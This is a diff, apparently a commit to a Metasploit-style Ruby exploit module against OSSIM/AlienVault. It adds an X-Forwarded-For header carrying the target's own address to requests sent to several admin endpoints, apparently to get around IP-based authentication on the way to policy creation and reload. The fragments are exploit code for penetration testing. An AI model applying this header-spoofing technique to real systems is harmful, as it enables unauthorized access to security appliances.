@@ -101,6 +101,7 @@ def exploit
101
101
'method' => 'GET' ,
102
102
'uri' => normalize_uri ( target_uri . path , 'ossim' , 'dashboard' , 'sections' , 'widgets' , 'data' , 'gauge.php' ) ,
103
103
'headers' => {
104
+ 'X-Forwarded-For' => rhost . to_s ,
104
105
'User-Agent' => 'AV Report Scheduler' ,
105
106
} ,
106
107
'vars_get' => {
@@ -127,6 +128,7 @@ def exploit
127
128
'method' => 'POST' ,
128
129
'uri' => normalize_uri ( target_uri . path , 'ossim' , 'action' , 'modifyactions.php' ) ,
129
130
'headers' => {
131
+ 'X-Forwarded-For' => rhost . to_s ,
130
132
'User-Agent' => 'AV Report Scheduler' ,
131
133
} ,
132
134
'vars_post' => {
@@ -164,6 +166,9 @@ def exploit
164
166
'method' => 'GET' ,
165
167
'uri' => normalize_uri ( target_uri . path , "ossim" , "action" , "getaction.php" ) ,
166
168
'cookie' => cookie ,
169
+ 'headers' => {
170
+ 'X-Forwarded-For' => rhost . to_s ,
171
+ } ,
167
172
'vars_get' => {
168
173
'page' => '1' ,
169
174
'rp' => '2000'
@@ -184,6 +189,9 @@ def exploit
184
189
'method' => 'GET' ,
185
190
'uri' => normalize_uri ( target_uri . path . to_s , "ossim" , "policy" , "policy.php" ) ,
186
191
'cookie' => cookie ,
192
+ 'headers' => {
193
+ 'X-Forwarded-For' => rhost . to_s ,
194
+ } ,
187
195
'vars_get' => {
188
196
'm_opt' => 'configuration' ,
189
197
'sm_opt' => 'threat_intelligence' ,
@@ -208,6 +216,9 @@ def exploit
208
216
'method' => 'POST' ,
209
217
'uri' => normalize_uri ( target_uri . path , "ossim" , "policy" , "newpolicy.php" ) ,
210
218
'cookie' => cookie ,
219
+ 'headers' => {
220
+ 'X-Forwarded-For' => rhost . to_s ,
221
+ } ,
211
222
'vars_post' => {
212
223
'descr' => policy ,
213
224
'active' => '1' ,
@@ -267,6 +278,9 @@ def exploit
267
278
'method' => 'GET' ,
268
279
'uri' => normalize_uri ( target_uri . path , "ossim" , "conf" , "reload.php" ) ,
269
280
'cookie' => cookie ,
281
+ 'headers' => {
282
+ 'X-Forwarded-For' => rhost . to_s ,
283
+ } ,
270
284
'vars_get' => {
271
285
'what' => 'policies' ,
272
286
'back' => '../policy/policy.php'
0 commit comments